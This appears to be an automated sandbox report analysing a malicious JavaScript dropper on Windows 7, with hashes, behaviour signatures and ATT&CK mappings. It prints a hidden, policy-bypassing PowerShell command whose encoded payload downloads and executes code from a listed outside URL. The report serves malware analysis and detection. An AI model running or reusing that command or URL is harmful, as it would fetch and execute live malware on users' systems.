1d70b27434446bd1fe5192238088cc83c8fcc685feaf00b266052f751c1077f9

Analysis

max time kernel
118s
max time network
128s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
22/12/2023, 04:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

60c36da8d79f10579883b61cf32a995c.js
Size

175KB
MD5

60c36da8d79f10579883b61cf32a995c
SHA1

ba1b52e9dbfc3079b1d4b7c5d40c7d23d56df276
SHA256

1d70b27434446bd1fe5192238088cc83c8fcc685feaf00b266052f751c1077f9
SHA512

dc5f2c5d91717d36ace6052d3e6f0a9bcf15f932c02e70870f5fb0eec5525e2c4b3579abf345fca9efb4f1406f00cf0f2e1e4974f6dcdd72c5e5a627e05a99b1
SSDEEP

3072:0kOBFat5SfZL1y0s09SBzb83XIIUwXSVhnBSfL822iwWmiwCm6Y5RP+Lj5pggfih:0kOBFat5zziRbYX2X7ffiDU+QrWkuyG/

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://quickdrive.ae/js/JS000082510952000/dll/assistant.php

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
5	2748	powershell.exe
7	2748	powershell.exe
9	2748	powershell.exe
12	2748	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2748	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2748	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2368 wrote to memory of 3056	2368	wscript.exe	30
PID 2368 wrote to memory of 3056	2368	wscript.exe	30
PID 2368 wrote to memory of 3056	2368	wscript.exe	30
PID 3056 wrote to memory of 2748	3056	cmd.exe	28
PID 3056 wrote to memory of 2748	3056	cmd.exe	28
PID 3056 wrote to memory of 2748	3056	cmd.exe	28

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\60c36da8d79f10579883b61cf32a995c.js
1⤵
- Suspicious use of WriteProcessMemory
PID:2368
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBxAHUAaQBjAGsAZAByAGkAdgBlAC4AYQBlAC8AagBzAC8ASgBTADAAMAAwADAAOAAyADUAMQAwADkANQAyADAAMAAwAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3056

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBxAHUAaQBjAGsAZAByAGkAdgBlAC4AYQBlAC8AagBzAC8ASgBTADAAMAAwADAAOAAyADUAMQAwADkANQAyADAAMAAwAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=
1⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2748

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2748-6-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp

Filesize
9.6MB

Download
memory/2748-9-0x0000000002D40000-0x0000000002DC0000-memory.dmp

Filesize
512KB

Download
memory/2748-10-0x0000000002D40000-0x0000000002DC0000-memory.dmp

Filesize
512KB

Download
memory/2748-8-0x0000000002D40000-0x0000000002DC0000-memory.dmp

Filesize
512KB

Download
memory/2748-7-0x0000000001E80000-0x0000000001E88000-memory.dmp

Filesize
32KB

Download
memory/2748-5-0x000000001B6B0000-0x000000001B992000-memory.dmp

Filesize
2.9MB

Download
memory/2748-11-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp

Filesize
9.6MB

Download
memory/2748-12-0x0000000002D40000-0x0000000002DC0000-memory.dmp

Filesize
512KB

Download
memory/2748-27-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp

Filesize
9.6MB

Download